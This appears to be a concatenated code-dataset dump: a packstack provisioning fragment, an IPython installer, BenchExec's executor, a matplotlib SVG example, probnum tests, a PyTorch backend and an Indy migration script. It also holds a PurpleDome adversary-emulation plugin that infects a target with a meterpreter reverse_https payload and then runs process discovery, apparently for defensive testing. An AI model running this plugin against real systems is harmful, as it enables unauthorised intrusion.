"PROVISION_ALL_IN_ONE_OVS_BRIDGE" : [
{"CMD_OPTION" : "provision-all-in-one-ovs-bridge",
"USAGE" : "Whether to configure the ovs external bridge in an all-in-one deployment",
"PROMPT" : "Would you like to configure the external ovs bridge?",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "n",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_ALL_IN_ONE_OVS_BRIDGE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
}
def allow_provisioning(config):
# Provisioning is currently supported only for all-in-one (due
# to a limitation with how the custom types for OpenStack
# resources are implemented).
return is_all_in_one(config)
def check_provisioning_demo(config):
return (allow_provisioning(config) and
(config.get('CONFIG_PROVISION_DEMO', 'n') == 'y' or
config.get('CONFIG_PROVISION_TEMPEST', 'n') == 'y'))
def check_provisioning_tempest(config):
return allow_provisioning(config) and \
config.get('CONFIG_PROVISION_TEMPEST', 'n') == 'y'
def allow_all_in_one_ovs_bridge(config):
return allow_provisioning(config) and \
config['CONFIG_NEUTRON_INSTALL'] == 'y' and \
config['CONFIG_NEUTRON_L2_PLUGIN'] == 'openvswitch'
conf_groups = [
{ "GROUP_NAME" : "PROVISION_INIT",
"DESCRIPTION" : "Provisioning demo config",
"PRE_CONDITION" : lambda x: 'yes',
"PRE_CONDITION_MATCH" : "yes",
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "PROVISION_DEMO",
"DESCRIPTION" : "Provisioning demo config",
"PRE_CONDITION" : check_provisioning_demo,
"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "TEMPEST_GIT_REFS",
"DESCRIPTION" : "Optional tempest git uri and branch",
"PRE_CONDITION" : check_provisioning_tempest,
"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "PROVISION_ALL_IN_ONE_OVS_BRIDGE",
"DESCRIPTION" : "Provisioning all-in-one ovs bridge config",
"PRE_CONDITION" : allow_all_in_one_ovs_bridge,
"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
]
for group in conf_groups:
paramList = conf_params[group["GROUP_NAME"]]
controller.addGroup(group, paramList)
# Due to group checking some parameters might not be initialized, but
# provision.pp needs them all. So we will initialize them with default
# values
params = [
controller.getParamByName(x)
for x in ['CONFIG_PROVISION_TEMPEST_REPO_URI',
'CONFIG_PROVISION_TEMPEST_REPO_REVISION',
'CONFIG_PROVISION_ALL_IN_ONE_OVS_BRIDGE']
]
for param in params:
value = controller.CONF.get(param.CONF_NAME, param.DEFAULT_VALUE)
controller.CONF[param.CONF_NAME] = value
def marshall_conf_bool(conf, key):
if conf[key] == 'y':
conf[key] = 'true'
else:
conf[key] = 'false'
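# Hedged illustration (not part of the original plugin): marshall_conf_bool()
# rewrites the interactive "y"/"n" answers into the "true"/"false" strings that
# the provision.pp manifest template expects, e.g.
#
#   conf = {'CONFIG_PROVISION_TEMPEST': 'y'}
#   marshall_conf_bool(conf, 'CONFIG_PROVISION_TEMPEST')
#   # conf['CONFIG_PROVISION_TEMPEST'] == 'true'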
def initSequences(controller):
provisioning_required = (
controller.CONF['CONFIG_PROVISION_DEMO'] == 'y'
or
controller.CONF['CONFIG_PROVISION_TEMPEST'] == 'y'
)
if not provisioning_required:
return
marshall_conf_bool(controller.CONF, 'CONFIG_PROVISION_TEMPEST')
marshall_conf_bool(controller.CONF,
'CONFIG_PROVISION_ALL_IN_ONE_OVS_BRIDGE')
provision_steps = [
{
'title': 'Adding Provisioning manifest entries',
'functions': [create_manifest],
}
]
controller.addSequence("Provisioning for Demo and Testing Usage",
[], [], provision_steps)
def create_manifest(config):
# Using the neutron or nova api servers as the provisioning target
# will suffice for the all-in-one case.
if config['CONFIG_NEUTRON_INSTALL'] == "y":
host = config['CONFIG_NEUTRON_SERVER_HOST']
else:
host = config['CONFIG_NOVA_API_HOST']
# The provisioning template requires the name of the external
# bridge but the value will be missing if neutron isn't
# configured to be installed.
config['CONFIG_NEUTRON_L3_EXT_BRIDGE'] = 'br-ex'
# Set template-specific parameter to configure whether neutron is
    # available. The value needs to be true/false rather than the y/n
    # provided by CONFIG_NEUTRON_INSTALL.
config['PROVISION_NEUTRON_AVAILABLE'] = config['CONFIG_NEUTRON_INSTALL']
marshall_conf_bool(config, 'PROVISION_NEUTRON_AVAILABLE')
manifest_file = '%s_provision.pp' % host
manifest_data = getManifestTemplate("provision.pp")
appendManifestFile(manifest_file, manifest_data)
| 42.790598
| 111
| 0.563567
|
f1bbf6934e44b865f274367a98ab235cd9bc9e28
| 1,257
|
py
|
Python
|
plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py
|
Thorsten-Sick/PurpleDome
|
297d746ef2e17a4207f8274b7fccbe2ce43c4a5f
|
[
"MIT"
] | 7
|
2021-11-30T19:54:29.000Z
|
2022-03-05T23:15:23.000Z
|
plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py
|
Thorsten-Sick/PurpleDome
|
297d746ef2e17a4207f8274b7fccbe2ce43c4a5f
|
[
"MIT"
] | null | null | null |
plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py
|
Thorsten-Sick/PurpleDome
|
297d746ef2e17a4207f8274b7fccbe2ce43c4a5f
|
[
"MIT"
] | 2
|
2021-11-30T11:16:27.000Z
|
2022-02-02T13:36:01.000Z
|
#!/usr/bin/env python3
# A plugin for process discovery (MITRE ATT&CK T1057) on targets via Metasploit
from plugins.base.attack import AttackPlugin, Requirement
class MetasploitPsPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_ps"
description = "Process discovery via metasploit"
ttp = "T1057"
references = ["https://attack.mitre.org/techniques/T1057/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
self.metasploit.ps_process_discovery(target)
return res
| 28.568182
| 126
| 0.595068
|
44593cf2b5414b5e7aac9e4d30f5b628b196a5f1
| 633
|
py
|
Python
|
install.py
|
zjw0358/ipython-auto-import
|
4249b3a9d18a5e27ec714b9a5e71a32ab63d1938
|
[
"MIT"
] | 55
|
2016-07-24T11:18:01.000Z
|
2018-10-02T12:34:04.000Z
|
install.py
|
zjw0358/ipython-auto-import
|
4249b3a9d18a5e27ec714b9a5e71a32ab63d1938
|
[
"MIT"
] | 9
|
2016-03-28T15:08:33.000Z
|
2016-07-28T20:27:02.000Z
|
install.py
|
AaronC81/ipython-auto-import
|
5ce4f51fe0ad559ba4481410168a27b0580337d0
|
[
"MIT"
] | 2
|
2016-07-23T05:50:05.000Z
|
2018-10-02T12:34:06.000Z
|
import shutil
import os
u = os.path.expanduser("~")
assert u != "~"
extensions_path = os.path.join(u, ".ipython", "extensions",
"import_wrapper.py")
config_path = os.path.join(u, ".ipython", "profile_default",
"ipython_config.py")
shutil.copyfile("import_wrapper.py", extensions_path)
with open(config_path, "a") as f:
f.write("\nc.InteractiveShellApp.exec_lines.append(\"%load_ext import_wra"
"pper\")")
print("Installation complete.")
try:
import colorama
except ImportError:
print("NOTE: Install 'colorama' for best results: 'pip install colorama'")
| 28.772727
| 78
| 0.649289
|
b821d581178cf8796896bfe24bb9e94e848b029b
| 6,890
|
py
|
Python
|
benchexec/baseexecutor.py
|
hoangmle/benchexec
|
ece94d34e13be2e0137574425e51173889a3e50a
|
[
"Apache-2.0"
] | null | null | null |
benchexec/baseexecutor.py
|
hoangmle/benchexec
|
ece94d34e13be2e0137574425e51173889a3e50a
|
[
"Apache-2.0"
] | null | null | null |
benchexec/baseexecutor.py
|
hoangmle/benchexec
|
ece94d34e13be2e0137574425e51173889a3e50a
|
[
"Apache-2.0"
] | null | null | null |
# BenchExec is a framework for reliable benchmarking.
# This file is part of BenchExec.
#
# Copyright (C) 2007-2015 Dirk Beyer
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# prepare for Python 3
from __future__ import absolute_import, division, print_function, unicode_literals
# THIS MODULE HAS TO WORK WITH PYTHON 2.7!
import errno
import logging
import os
import signal
import subprocess
import sys
import threading
sys.dont_write_bytecode = True # prevent creation of .pyc files
from benchexec import __version__
from benchexec import util
def add_basic_executor_options(argument_parser):
"""Add some basic options for an executor to an argparse argument_parser."""
argument_parser.add_argument(
"args",
nargs="+",
metavar="ARG",
help='command line to run (prefix with "--" to ensure all arguments are treated correctly)',
)
argument_parser.add_argument(
"--version", action="version", version="%(prog)s " + __version__
)
verbosity = argument_parser.add_mutually_exclusive_group()
verbosity.add_argument("--debug", action="store_true", help="show debug output")
verbosity.add_argument("--quiet", action="store_true", help="show only warnings")
def handle_basic_executor_options(options, parser):
"""Handle the options specified by add_basic_executor_options()."""
# setup logging
logLevel = logging.INFO
if options.debug:
logLevel = logging.DEBUG
elif options.quiet:
logLevel = logging.WARNING
util.setup_logging(level=logLevel)
class BaseExecutor(object):
"""Class for starting and handling processes."""
def __init__(self):
self.PROCESS_KILLED = False
# killing process is triggered asynchronously, need a lock for synchronization
self.SUB_PROCESS_PIDS_LOCK = threading.Lock()
self.SUB_PROCESS_PIDS = set()
def _get_result_files_base(self, temp_dir):
"""Given the temp directory that is created for each run, return the path to the directory
where files created by the tool are stored."""
return temp_dir
def _start_execution(
self,
args,
stdin,
stdout,
stderr,
env,
cwd,
temp_dir,
cgroups,
parent_setup_fn,
child_setup_fn,
parent_cleanup_fn,
):
"""Actually start the tool and the measurements.
@param parent_setup_fn a function without parameters that is called in the parent process
immediately before the tool is started
@param child_setup_fn a function without parameters that is called in the child process
before the tool is started
@param parent_cleanup_fn a function that is called in the parent process
immediately after the tool terminated, with three parameters:
the result of parent_setup_fn, the result of the executed process as ProcessExitCode,
and the base path for looking up files as parameter values
@return: a tuple of PID of process and a blocking function, which waits for the process
and a triple of the exit code and the resource usage of the process
and the result of parent_cleanup_fn (do not use os.wait)
"""
def pre_subprocess():
# Do some other setup the caller wants.
child_setup_fn()
# put us into the cgroup(s)
pid = os.getpid()
cgroups.add_task(pid)
# Set HOME and TMPDIR to fresh directories.
tmp_dir = os.path.join(temp_dir, "tmp")
home_dir = os.path.join(temp_dir, "home")
os.mkdir(tmp_dir)
os.mkdir(home_dir)
env["HOME"] = home_dir
env["TMPDIR"] = tmp_dir
env["TMP"] = tmp_dir
env["TEMPDIR"] = tmp_dir
env["TEMP"] = tmp_dir
logging.debug("Executing run with $HOME and $TMPDIR below %s.", temp_dir)
parent_setup = parent_setup_fn()
p = subprocess.Popen(
args,
stdin=stdin,
stdout=stdout,
stderr=stderr,
env=env,
cwd=cwd,
close_fds=True,
preexec_fn=pre_subprocess,
)
def wait_and_get_result():
exitcode, ru_child = self._wait_for_process(p.pid, args[0])
parent_cleanup = parent_cleanup_fn(
parent_setup, util.ProcessExitCode.from_raw(exitcode), ""
)
return exitcode, ru_child, parent_cleanup
return p.pid, wait_and_get_result
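    # Hedged caller sketch (not part of the original module): the tuple
    # returned above is typically consumed along these lines
    #
    #   pid, wait_fn = self._start_execution(args, stdin, stdout, stderr, env,
    #                                        cwd, temp_dir, cgroups,
    #                                        parent_setup_fn, child_setup_fn,
    #                                        parent_cleanup_fn)
    #   ...register pid so stop() can kill it if needed...
    #   exitcode, ru_child, parent_cleanup = wait_fn()
    #
    # wait_fn() blocks in os.wait4(), so it must be called exactly once and
    # must not be combined with a bare os.wait() elsewhere (see the docstring).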
def _wait_for_process(self, pid, name):
"""Wait for the given process to terminate.
@return tuple of exit code and resource usage
"""
try:
logging.debug("Waiting for process %s with pid %s", name, pid)
unused_pid, exitcode, ru_child = os.wait4(pid, 0)
return exitcode, ru_child
except OSError as e:
if self.PROCESS_KILLED and e.errno == errno.EINTR:
# Interrupted system call seems always to happen
# if we killed the process ourselves after Ctrl+C was pressed
# We can try again to get exitcode and resource usage.
logging.debug(
"OSError %s while waiting for termination of %s (%s): %s.",
e.errno,
name,
pid,
e.strerror,
)
try:
unused_pid, exitcode, ru_child = os.wait4(pid, 0)
return exitcode, ru_child
except OSError:
pass # original error will be handled and this ignored
logging.critical(
"OSError %s while waiting for termination of %s (%s): %s.",
e.errno,
name,
pid,
e.strerror,
)
return 0, None
def stop(self):
self.PROCESS_KILLED = True
with self.SUB_PROCESS_PIDS_LOCK:
for pid in self.SUB_PROCESS_PIDS:
logging.warning("Killing process %s forcefully.", pid)
try:
util.kill_process(pid)
except EnvironmentError as e:
# May fail due to race conditions
logging.debug(e)
| 35.153061
| 100
| 0.618287
|
8b0defd5c58a703abcb0bfb4568d03dc75234874
| 2,857
|
py
|
Python
|
examples/misc/svg_filter_pie.py
|
nkoep/matplotlib
|
6ed04252994443a4cecf95f0da0efedb6d514b38
|
[
"MIT",
"BSD-3-Clause"
] | 1
|
2017-02-05T18:05:07.000Z
|
2017-02-05T18:05:07.000Z
|
examples/misc/svg_filter_pie.py
|
nkoep/matplotlib
|
6ed04252994443a4cecf95f0da0efedb6d514b38
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
examples/misc/svg_filter_pie.py
|
nkoep/matplotlib
|
6ed04252994443a4cecf95f0da0efedb6d514b38
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
"""
Demonstrate SVG filtering effects which might be used with mpl.
The pie chart drawing code is borrowed from pie_demo.py
Note that the filtering effects are only effective if your SVG renderer
supports them.
"""
import matplotlib
matplotlib.use("Svg")
import matplotlib.pyplot as plt
from matplotlib.patches import Shadow
# make a square figure and axes
fig1 = plt.figure(1, figsize=(6,6))
ax = fig1.add_axes([0.1, 0.1, 0.8, 0.8])
labels = 'Frogs', 'Hogs', 'Dogs', 'Logs'
fracs = [15,30,45, 10]
explode=(0, 0.05, 0, 0)
# We want to draw the shadow for each pie but we will not use "shadow"
# option as it doesn't save the references to the shadow patches.
pies = ax.pie(fracs, explode=explode, labels=labels, autopct='%1.1f%%')
for w in pies[0]:
# set the id with the label.
w.set_gid(w.get_label())
# we don't want to draw the edge of the pie
w.set_ec("none")
for w in pies[0]:
# create shadow patch
s = Shadow(w, -0.01, -0.01)
s.set_gid(w.get_gid()+"_shadow")
s.set_zorder(w.get_zorder() - 0.1)
ax.add_patch(s)
# save
from StringIO import StringIO
f = StringIO()
plt.savefig(f, format="svg")
import xml.etree.cElementTree as ET
# filter definition for the shadow, using a Gaussian blur
# and a lightening effect.
# The lightening filter is copied from http://www.w3.org/TR/SVG/filters.html
# I tested it with Inkscape and Firefox 3. "Gaussian blur" is supported
# in both, but the lightening effect only in Inkscape. Also note
# that Inkscape's export may not support it either.
filter_def = """
<defs xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'>
<filter id='dropshadow' height='1.2' width='1.2'>
<feGaussianBlur result='blur' stdDeviation='2'/>
</filter>
<filter id='MyFilter' filterUnits='objectBoundingBox' x='0' y='0' width='1' height='1'>
<feGaussianBlur in='SourceAlpha' stdDeviation='4%' result='blur'/>
<feOffset in='blur' dx='4%' dy='4%' result='offsetBlur'/>
<feSpecularLighting in='blur' surfaceScale='5' specularConstant='.75'
specularExponent='20' lighting-color='#bbbbbb' result='specOut'>
<fePointLight x='-5000%' y='-10000%' z='20000%'/>
</feSpecularLighting>
<feComposite in='specOut' in2='SourceAlpha' operator='in' result='specOut'/>
<feComposite in='SourceGraphic' in2='specOut' operator='arithmetic'
k1='0' k2='1' k3='1' k4='0'/>
</filter>
</defs>
"""
tree, xmlid = ET.XMLID(f.getvalue())
# insert the filter definition in the svg dom tree.
tree.insert(0, ET.XML(filter_def))
for i, pie_name in enumerate(labels):
pie = xmlid[pie_name]
pie.set("filter", 'url(#MyFilter)')
shadow = xmlid[pie_name + "_shadow"]
shadow.set("filter",'url(#dropshadow)')
fn = "svg_filter_pie.svg"
print "Saving '%s'" % fn
ET.ElementTree(tree).write(fn)
| 29.760417
| 91
| 0.675534
|
251dc0ad15e11e2ad3962f3532789e93b59ecc1c
| 3,852
|
py
|
Python
|
tests/test_filtsmooth/test_gaussian/test_kalman.py
|
treid5/probnum
|
fabb51243d0952fbd35e542aeb5c2dc9a449ec81
|
[
"MIT"
] | 226
|
2019-11-01T09:44:09.000Z
|
2022-03-30T23:17:17.000Z
|
tests/test_filtsmooth/test_gaussian/test_kalman.py
|
simeoncarstens/probnum
|
b69587b07e2fffbdcd4c850acc98bb3de97a6e0b
|
[
"MIT"
] | 590
|
2019-11-21T08:32:30.000Z
|
2022-03-31T12:37:37.000Z
|
tests/test_filtsmooth/test_gaussian/test_kalman.py
|
JonathanWenger/probnum
|
1c5499883672cfa029c12045848ea04491c69e08
|
[
"MIT"
] | 39
|
2020-01-13T16:29:45.000Z
|
2022-03-28T16:16:54.000Z
|
import numpy as np
import pytest
import probnum.problems.zoo.filtsmooth as filtsmooth_zoo
from probnum import filtsmooth
# Problems
@pytest.fixture(params=[filtsmooth_zoo.car_tracking, filtsmooth_zoo.ornstein_uhlenbeck])
def setup(request, rng):
"""Filter and regression problem."""
problem = request.param
regression_problem, info = problem(rng=rng)
kalman = filtsmooth.gaussian.Kalman(info["prior_process"])
return kalman, regression_problem
def test_rmse_filt_smooth(setup):
"""Assert that smoothing beats filtering beats nothing."""
np.random.seed(12345)
kalman, regression_problem = setup
truth = regression_problem.solution
posterior, _ = kalman.filtsmooth(regression_problem)
filtms = posterior.filtering_posterior.states.mean
smooms = posterior.states.mean
filtms_rmse = np.mean(np.abs(filtms[:, :2] - truth[:, :2]))
smooms_rmse = np.mean(np.abs(smooms[:, :2] - truth[:, :2]))
obs_rmse = np.mean(np.abs(regression_problem.observations - truth[:, :2]))
assert smooms_rmse < filtms_rmse < obs_rmse
def test_info_dicts(setup):
"""Assert that smoothing beats filtering beats nothing."""
np.random.seed(12345)
kalman, regression_problem = setup
posterior, info_dicts = kalman.filtsmooth(regression_problem)
assert isinstance(info_dicts, list)
assert len(posterior) == len(info_dicts)
def test_kalman_smoother_high_order_ibm(rng):
"""The highest feasible order (without damping, which we dont use) is 11.
If this test breaks, someone played with the stable square-root implementations in
discrete_transition: for instance, solve_triangular() and cho_solve() must not be
changed to inv()!
"""
regression_problem, info = filtsmooth_zoo.car_tracking(
rng=rng,
num_prior_derivatives=11,
timespan=(0.0, 1e-3),
step=1e-5,
forward_implementation="sqrt",
backward_implementation="sqrt",
)
truth = regression_problem.solution
kalman = filtsmooth.gaussian.Kalman(info["prior_process"])
posterior, _ = kalman.filtsmooth(regression_problem)
filtms = posterior.filtering_posterior.states.mean
smooms = posterior.states.mean
filtms_rmse = np.mean(np.abs(filtms[:, :2] - truth[:, :2]))
smooms_rmse = np.mean(np.abs(smooms[:, :2] - truth[:, :2]))
obs_rmse = np.mean(np.abs(regression_problem.observations - truth[:, :2]))
assert smooms_rmse < filtms_rmse < obs_rmse
def test_kalman_multiple_measurement_models(rng):
regression_problem, info = filtsmooth_zoo.car_tracking(
rng=rng,
num_prior_derivatives=4,
timespan=(0.0, 1e-3),
step=1e-5,
forward_implementation="sqrt",
backward_implementation="sqrt",
)
truth = regression_problem.solution
kalman = filtsmooth.gaussian.Kalman(info["prior_process"])
posterior, _ = kalman.filtsmooth(regression_problem)
filtms = posterior.filtering_posterior.states.mean
smooms = posterior.states.mean
filtms_rmse = np.mean(np.abs(filtms[:, :2] - truth[:, :2]))
smooms_rmse = np.mean(np.abs(smooms[:, :2] - truth[:, :2]))
obs_rmse = np.mean(np.abs(regression_problem.observations - truth[:, :2]))
assert smooms_rmse < filtms_rmse < obs_rmse
def test_kalman_value_error_repeating_timepoints(rng):
regression_problem, info = filtsmooth_zoo.car_tracking(
rng=rng,
num_prior_derivatives=4,
timespan=(0.0, 1e-3),
step=1e-5,
forward_implementation="sqrt",
backward_implementation="sqrt",
)
kalman = filtsmooth.gaussian.Kalman(info["prior_process"])
# This should raise a ValueError
regression_problem.locations[1] = regression_problem.locations[0]
with pytest.raises(ValueError):
posterior, _ = kalman.filtsmooth(regression_problem)
| 31.57377
| 88
| 0.702752
|
370aea85fb542ce132dbb342b5e39fb826855ca6
| 1,341
|
py
|
Python
|
PrimeUs/Multiply.py
|
wyllie/PrimeUs
|
e076669d7cb1d29179606723204a7bd746778495
|
[
"MIT"
] | null | null | null |
PrimeUs/Multiply.py
|
wyllie/PrimeUs
|
e076669d7cb1d29179606723204a7bd746778495
|
[
"MIT"
] | 2
|
2019-10-15T22:28:13.000Z
|
2019-10-16T13:25:36.000Z
|
PrimeUs/Multiply.py
|
wyllie/PrimeUs
|
e076669d7cb1d29179606723204a7bd746778495
|
[
"MIT"
] | 1
|
2019-10-16T21:22:36.000Z
|
2019-10-16T21:22:36.000Z
|
class Multiply():
def __init__(self):
pass
def two_lists(self, rows, columns):
'create a multiplication table from two lists of integers'
table = []
row1 = ['X']
row1.extend(columns)
table.append(row1)
for row in sorted(rows):
row_list = [row]
for column in sorted(columns):
row_list.append(row * column)
table.append(row_list)
return table
def two_lists_dict(self, rows, columns):
'create a multiplication table from two lists of integers'
table = dict()
for row in sorted(rows):
row_dict = dict()
for column in sorted(columns):
row_dict[column] = row * column
table[row] = row_dict
return table
def format_table(self, table):
'return a nicely(ish) formatted table'
# get the width of each column
widths = []
for col in zip(*table):
widths.append(max(map(len, map(str, col))))
# create the formatted rows
output_rows = []
for row in table:
output_rows.append(' '.join(str(val).rjust(width)
for val, width in zip(row, widths)))
output = '\n'.join(output_rows)
return output
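# --- Hedged usage example (not part of the original module) ---
# Expected behaviour of the helpers above for two small input lists:
#
#   m = Multiply()
#   table = m.two_lists([1, 2, 3], [4, 5])
#   # table == [['X', 4, 5], [1, 4, 5], [2, 8, 10], [3, 12, 15]]
#   print(m.format_table(table))
#   # X  4  5
#   # 1  4  5
#   # 2  8 10
#   # 3 12 15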
| 25.301887
| 76
| 0.536167
|
5878589c43ef41e93f2acb3b87f08e9ec3bc204a
| 1,164
|
py
|
Python
|
python/520.py
|
HymEric/LeetCode
|
e32439a76968d67f99881b6d07fb16e21c979c9e
|
[
"Apache-2.0"
] | 2
|
2019-09-27T11:41:02.000Z
|
2019-10-17T21:50:23.000Z
|
python/520.py
|
HymEric/LeetCode
|
e32439a76968d67f99881b6d07fb16e21c979c9e
|
[
"Apache-2.0"
] | null | null | null |
python/520.py
|
HymEric/LeetCode
|
e32439a76968d67f99881b6d07fb16e21c979c9e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Time : 2019/10/15 0015 16:21
# @Author : Erichym
# @Email : 951523291@qq.com
# @File : 520.py
# @Software: PyCharm
class Solution:
def detectCapitalUse(self, word: str) -> bool:
if 97<=ord(word[0])<=122:
for i in range(1,len(word),1):
if ord(word[i])>122 or ord(word[i])<97:
return False
return True
# first alpha is capital
elif len(word)>1:
if 65 <= ord(word[1]) <= 90:
for i in range(2, len(word), 1):
if ord(word[i]) > 90 or ord(word[i]) < 65:
return False
return True
if 97 <= ord(word[1]) <= 122:
for i in range(1, len(word), 1):
if ord(word[i]) > 122 or ord(word[i]) < 97:
return False
return True
else:
return True
def detectCapitalUse2(self, word: str) -> bool:
return word.isupper() or word.islower() or word.istitle()
if __name__=="__main__":
word="G"
so=Solution()
a=so.detectCapitalUse2(word)
print(a)
| 32.333333
| 65
| 0.4811
|
2e8ff20a48ded4afd71689424ce90011177e1927
| 2,275
|
py
|
Python
|
geomstats/_backend/pytorch/linalg.py
|
tristancabel/geomstats
|
eeba7b7a652d45fc0053e35219c03627f2e8406f
|
[
"MIT"
] | 2
|
2020-01-23T04:01:02.000Z
|
2020-08-18T19:20:27.000Z
|
geomstats/_backend/pytorch/linalg.py
|
tristancabel/geomstats
|
eeba7b7a652d45fc0053e35219c03627f2e8406f
|
[
"MIT"
] | null | null | null |
geomstats/_backend/pytorch/linalg.py
|
tristancabel/geomstats
|
eeba7b7a652d45fc0053e35219c03627f2e8406f
|
[
"MIT"
] | 1
|
2021-03-14T06:54:09.000Z
|
2021-03-14T06:54:09.000Z
|
"""Pytorch based linear algebra backend."""
import numpy as np
import scipy.linalg
import torch
def _raise_not_implemented_error(*args, **kwargs):
raise NotImplementedError
eig = _raise_not_implemented_error
expm = torch.matrix_exp
logm = _raise_not_implemented_error
inv = torch.inverse
det = torch.det
def cholesky(a):
return torch.cholesky(a, upper=False)
def sqrtm(x):
np_sqrtm = np.vectorize(
scipy.linalg.sqrtm, signature='(n,m)->(n,m)')(x)
return torch.as_tensor(np_sqrtm, dtype=x.dtype)
def eigvalsh(a, **kwargs):
upper = False
if 'UPLO' in kwargs:
upper = (kwargs['UPLO'] == 'U')
return torch.symeig(a, eigenvectors=False, upper=upper)[0]
def eigh(*args, **kwargs):
eigvals, eigvecs = torch.symeig(*args, eigenvectors=True, **kwargs)
return eigvals, eigvecs
def svd(x, full_matrices=True, compute_uv=True):
is_vectorized = x.ndim == 3
axis = (0, 2, 1) if is_vectorized else (1, 0)
if compute_uv:
u, s, v_t = torch.svd(
x, some=not full_matrices, compute_uv=compute_uv)
return u, s, v_t.permute(axis)
return torch.svd(x, some=not full_matrices, compute_uv=compute_uv)[1]
def norm(x, ord=None, axis=None):
if axis is None:
return torch.linalg.norm(x, ord=ord)
return torch.linalg.norm(x, ord=ord, dim=axis)
def solve_sylvester(a, b, q):
if a.shape == b.shape:
if torch.all(a == b) and torch.all(
torch.abs(a - a.transpose(-2, -1)) < 1e-6):
eigvals, eigvecs = eigh(a)
if torch.all(eigvals >= 1e-6):
tilde_q = eigvecs.transpose(-2, -1) @ q @ eigvecs
tilde_x = tilde_q / (
eigvals[..., :, None] + eigvals[..., None, :])
return eigvecs @ tilde_x @ eigvecs.transpose(-2, -1)
solution = np.vectorize(
scipy.linalg.solve_sylvester,
signature='(m,m),(n,n),(m,n)->(m,n)')(a, b, q)
return torch.from_numpy(solution)
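# Hedged note (not part of the original backend): the symmetric fast path in
# solve_sylvester() above uses the fact that for a symmetric positive-definite
# A = V diag(l) V^T, the equation A X + X A = Q becomes, after the change of
# basis X~ = V^T X V and Q~ = V^T Q V, the elementwise relation
# (l_i + l_j) X~_ij = Q~_ij, so X~_ij = Q~_ij / (l_i + l_j), which is exactly
# what the tilde_x computation implements. Every other case falls back to
# scipy.linalg.solve_sylvester via np.vectorize.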
def qr(*args, **kwargs):
matrix_q, matrix_r = np.vectorize(
np.linalg.qr,
signature='(n,m)->(n,k),(k,m)',
excluded=['mode'])(*args, **kwargs)
tensor_q = torch.from_numpy(matrix_q)
tensor_r = torch.from_numpy(matrix_r)
return tensor_q, tensor_r
| 27.743902
| 73
| 0.615824
|
0e6bacf3a70fc455f4c72f489e7e793ce7ab99fc
| 1,301
|
py
|
Python
|
data/migrations/deb/1_1_150_to_1_1_151.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 627
|
2017-07-06T12:38:08.000Z
|
2022-03-30T13:18:43.000Z
|
data/migrations/deb/1_1_150_to_1_1_151.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 580
|
2017-06-29T17:59:57.000Z
|
2022-03-29T21:37:52.000Z
|
data/migrations/deb/1_1_150_to_1_1_151.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 704
|
2017-06-29T17:45:34.000Z
|
2022-03-30T07:08:58.000Z
|
import os
import shutil
import subprocess
from indy_common.util import compose_cmd
def rename_if_exists(dir, old_name, new_name):
if os.path.exists(os.path.join(dir, old_name)):
os.rename(os.path.join(dir, old_name),
os.path.join(dir, new_name))
def rename_request_files(requests_dir):
for relative_name in os.listdir(requests_dir):
absolute_name = os.path.join(requests_dir, relative_name)
if os.path.isfile(absolute_name) and absolute_name.endswith('.sovrin'):
os.rename(absolute_name, absolute_name[:-len('.sovrin')] + '.indy')
def migrate():
source_dir = os.path.expanduser('/home/sovrin/.sovrin')
target_dir = os.path.expanduser('/home/indy/.indy')
if os.path.isdir(target_dir):
shutil.rmtree(target_dir)
shutil.copytree(source_dir, target_dir)
rename_if_exists(target_dir, '.sovrin', '.indy')
rename_if_exists(target_dir, 'sovrin.env', 'indy.env')
rename_if_exists(target_dir, 'sovrin_config.py', 'indy_config.py')
if os.path.isdir(os.path.join(target_dir, 'sample')):
rename_request_files(os.path.join(target_dir, 'sample'))
subprocess.run(compose_cmd(['chown', '-R', 'indy:indy', target_dir]),
shell=True,
check=True)
migrate()
| 30.97619
| 79
| 0.676403
|
e2f7115d5945da0fd5f4c42038a68ad9c5a7efc0
| 3,177
|
py
|
Python
|
photomanager/lib/filter.py
|
wrenchzc/photomanagger
|
1111587762b6e71b9ffff06241cdcd537b8c96e9
|
[
"MIT"
] | null | null | null |
photomanager/lib/filter.py
|
wrenchzc/photomanagger
|
1111587762b6e71b9ffff06241cdcd537b8c96e9
|
[
"MIT"
] | 4
|
2019-09-18T14:58:16.000Z
|
